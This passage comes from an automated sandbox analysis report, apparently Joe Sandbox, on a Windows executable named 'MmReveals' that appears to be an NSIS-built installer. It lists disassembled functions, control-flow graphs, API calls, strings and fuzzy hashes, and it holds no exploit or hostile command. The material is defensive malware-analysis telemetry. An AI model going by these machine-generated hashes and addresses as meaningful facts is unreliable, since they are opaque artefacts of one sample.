49->1 58->1 60->1 69 4019af-4019b2 65->69 66->69 76 401986-401989 66->76 69->1 79 4019b8-4019c5 GetShortPathNameW 69->79 76->69 87 40198b-401993 call 4062d5 76->87 79->1 100 4017ab-4017ac 83->100 84->1 85->26 86->26 87->65 110 401995-4019a1 call 406009 87->110 89->1 90->89 92->26 100->1 108 401890-401892 105->108 109 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 105->109 118 401846-40184e call 4062a3 106->118 119 4017fe-401809 GetLastError 106->119 108->84 109->1 110->69 113->84 120 401923-40192b call 4062d5 114->120 121 40194a-401950 114->121 133 401853-401854 118->133 124 401827-401832 GetFileAttributesW 119->124 125 40180b-401825 GetLastError call 4062a3 119->125 120->121 139 40192d-401948 call 406c68 call 404f72 120->139 129 401957-40195d call 4062a3 121->129 131 401834-401844 call 4062a3 124->131 132 401855-40185e 124->132 125->132 129->100 131->133 132->105 132->106 133->132 139->129
                          APIs
                          • PostQuitMessage.USER32(00000000), ref: 00401648
                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                          • SetForegroundWindow.USER32(?), ref: 004016CB
                          • ShowWindow.USER32(?), ref: 00401753
                          • ShowWindow.USER32(?), ref: 00401767
                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                          • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                          Strings
                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                          • CreateDirectory: "%s" created, xrefs: 00401849
                          • Rename failed: %s, xrefs: 0040194B
                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                          • Call: %d, xrefs: 0040165A
                          • Rename: %s, xrefs: 004018F8
                          • detailprint: %s, xrefs: 00401679
                          • SetFileAttributes failed., xrefs: 004017A1
                          • Sleep(%d), xrefs: 0040169D
                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                          • Rename on reboot: %s, xrefs: 00401943
                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                          • BringToFront, xrefs: 004016BD
                          • Aborting: "%s", xrefs: 0040161D
                          • Jump: %d, xrefs: 00401602
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                          • API String ID: 2872004960-3619442763
                          • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                          • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                          Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 267 40592c-405944 call 4062fc 270 405946-405956 call 405f51 267->270 271 405958-405990 call 405ed3 267->271 279 4059b3-4059dc call 403e95 call 40677e 270->279 276 405992-4059a3 call 405ed3 271->276 277 4059a8-4059ae lstrcatW 271->277 276->277 277->279 285 405a70-405a78 call 40677e 279->285 286 4059e2-4059e7 279->286 292 405a86-405a8d 285->292 293 405a7a-405a81 call 406805 285->293 286->285 287 4059ed-405a15 call 405ed3 286->287 287->285 294 405a17-405a1b 287->294 296 405aa6-405acb LoadImageW 292->296 297 405a8f-405a95 292->297 293->292 301 405a1d-405a2c call 405d06 294->301 302 405a2f-405a3b lstrlenW 294->302 299 405ad1-405b13 RegisterClassW 296->299 300 405b66-405b6e call 40141d 296->300 297->296 298 405a97-405a9c call 403e74 297->298 298->296 306 405c35 299->306 307 405b19-405b61 SystemParametersInfoW CreateWindowExW 299->307 319 405b70-405b73 300->319 320 405b78-405b83 call 403e95 300->320 301->302 303 405a63-405a6b call 406722 call 406009 302->303 304 405a3d-405a4b lstrcmpiW 302->304 303->285 304->303 311 405a4d-405a57 GetFileAttributesW 304->311 310 405c37-405c3e 306->310 307->300 316 405a59-405a5b 311->316 317 405a5d-405a5e call 406751 311->317 316->303 316->317 317->303 319->310 325 405b89-405ba6 ShowWindow LoadLibraryW 320->325 326 405c0c-405c14 call 405047 320->326 328 405ba8-405bad LoadLibraryW 325->328 329 405baf-405bc1 GetClassInfoW 325->329 334 405c16-405c1c 326->334 335 405c2e-405c30 call 40141d 326->335 328->329 330 405bc3-405bd3 GetClassInfoW RegisterClassW 329->330 331 405bd9-405c0a DialogBoxParamW call 40141d call 403c68 329->331 330->331 331->310 334->319 337 405c22-405c29 call 40141d 334->337 335->306 337->319
                          APIs
                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                          • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                          • API String ID: 608394941-1650083594
                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                          Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                          • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004CB0B0,00000000,00000000), ref: 00401AA0
                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                          • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                          • API String ID: 4286501637-2478300759
                          • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                          • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                          Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 428 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 431 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 428->431 432 4035d7-4035dc 428->432 440 403615 431->440 441 4036fc-40370a call 4032d2 431->441 433 4037b6-4037ba 432->433 443 40361a-403631 440->443 447 403710-403713 441->447 448 4037c5-4037ca 441->448 445 403633 443->445 446 403635-403637 call 403336 443->446 445->446 452 40363c-40363e 446->452 450 403715-40372d call 403368 call 403336 447->450 451 40373f-403769 GlobalAlloc call 403368 call 40337f 447->451 448->433 450->448 478 403733-403739 450->478 451->448 476 40376b-40377c 451->476 454 403644-40364b 452->454 455 4037bd-4037c4 call 4032d2 452->455 460 4036c7-4036cb 454->460 461 40364d-403661 call 405e0c 454->461 455->448 464 4036d5-4036db 460->464 465 4036cd-4036d4 call 4032d2 460->465 461->464 475 403663-40366a 461->475 472 4036ea-4036f4 464->472 473 4036dd-4036e7 call 407281 464->473 465->464 472->443 477 4036fa 472->477 473->472 475->464 481 40366c-403673 475->481 482 403784-403787 476->482 483 40377e 476->483 477->441 478->448 478->451 481->464 484 403675-40367c 481->484 485 40378a-403792 482->485 483->482 484->464 486 40367e-403685 484->486 485->485 487 403794-4037af SetFilePointer call 405e0c 485->487 486->464 488 403687-4036a7 486->488 491 4037b4 487->491 488->448 490 4036ad-4036b1 488->490 492 4036b3-4036b7 490->492 493 4036b9-4036c1 490->493 491->433 492->477 492->493 493->464 494 4036c3-4036c5 493->494 494->464
                          APIs
                          • GetTickCount.KERNEL32 ref: 00403598
                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                          Strings
                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                          • soft, xrefs: 00403675
                          • Error launching installer, xrefs: 004035D7
                          • Inst, xrefs: 0040366C
                          • Null, xrefs: 0040367E
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                          • API String ID: 4283519449-527102705
                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                          Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 495 40337f-403396 496 403398 495->496 497 40339f-4033a7 495->497 496->497 498 4033a9 497->498 499 4033ae-4033b3 497->499 498->499 500 4033c3-4033d0 call 403336 499->500 501 4033b5-4033be call 403368 499->501 505 4033d2 500->505 506 4033da-4033e1 500->506 501->500 507 4033d4-4033d5 505->507 508 4033e7-403407 GetTickCount call 4072f2 506->508 509 403518-40351a 506->509 510 403539-40353d 507->510 521 403536 508->521 523 40340d-403415 508->523 511 40351c-40351f 509->511 512 40357f-403583 509->512 514 403521 511->514 515 403524-40352d call 403336 511->515 516 403540-403546 512->516 517 403585 512->517 514->515 515->505 530 403533 515->530 519 403548 516->519 520 40354b-403559 call 403336 516->520 517->521 519->520 520->505 532 40355f-403572 WriteFile 520->532 521->510 526 403417 523->526 527 40341a-403428 call 403336 523->527 526->527 527->505 533 40342a-403433 527->533 530->521 534 403511-403513 532->534 535 403574-403577 532->535 536 403439-403456 call 407312 533->536 534->507 535->534 537 403579-40357c 535->537 540 40350a-40350c 536->540 541 40345c-403473 GetTickCount 536->541 537->512 540->507 542 403475-40347d 541->542 543 4034be-4034c2 541->543 544 403485-4034bb MulDiv wsprintfW call 404f72 542->544 545 40347f-403483 542->545 546 4034c4-4034c7 543->546 547 4034ff-403502 543->547 544->543 545->543 545->544 550 4034e7-4034ed 546->550 551 4034c9-4034db WriteFile 546->551 547->523 548 403508 547->548 548->521 552 4034f3-4034f7 550->552 551->534 554 4034dd-4034e0 551->554 552->536 556 4034fd 552->556 554->534 555 4034e2-4034e5 554->555 555->552 556->521
                          APIs
                          • GetTickCount.KERNEL32 ref: 004033E7
                          • GetTickCount.KERNEL32 ref: 00403464
                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                          • wsprintfW.USER32 ref: 004034A4
                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                          Strings
                          • ... %d%%, xrefs: 0040349E
                          • X1C, xrefs: 0040343C
                          • OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO, xrefs: 004033A9
                          • X1C, xrefs: 004033ED
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: CountFileTickWrite$wsprintf
                          • String ID: ... %d%%$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO$X1C$X1C
                          • API String ID: 651206458-1396068033
                          • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                          • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                          Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 557 401eb9-401ec4 558 401f24-401f26 557->558 559 401ec6-401ec9 557->559 560 401f53-401f7b GlobalAlloc call 406805 558->560 561 401f28-401f2a 558->561 562 401ed5-401ee3 call 4062a3 559->562 563 401ecb-401ecf 559->563 576 4030e3-4030f2 560->576 577 402387-40238d GlobalFree 560->577 565 401f3c-401f4e call 406009 561->565 566 401f2c-401f36 call 4062a3 561->566 574 401ee4-402702 call 406805 562->574 563->559 567 401ed1-401ed3 563->567 565->577 566->565 567->562 573 401ef7-402e50 call 406009 * 3 567->573 573->576 589 402708-40270e 574->589 577->576 589->576
                          APIs
                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                          • GlobalFree.KERNELBASE(00891120), ref: 00402387
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: FreeGloballstrcpyn
                          • String ID: Exch: stack < %d elements$Pop: stack empty$open
                          • API String ID: 1459762280-1711415406
                          • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                          • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                          Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 592 4022fd-402325 call 40145c GetFileVersionInfoSizeW 595 4030e3-4030f2 592->595 596 40232b-402339 GlobalAlloc 592->596 596->595 597 40233f-40234e GetFileVersionInfoW 596->597 599 402350-402367 VerQueryValueW 597->599 600 402384-40238d GlobalFree 597->600 599->600 603 402369-402381 call 405f51 * 2 599->603 600->595 603->600
                          APIs
                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                          • GlobalFree.KERNELBASE(00891120), ref: 00402387
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                          • String ID:
                          • API String ID: 3376005127-0
                          • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                          • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                          Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
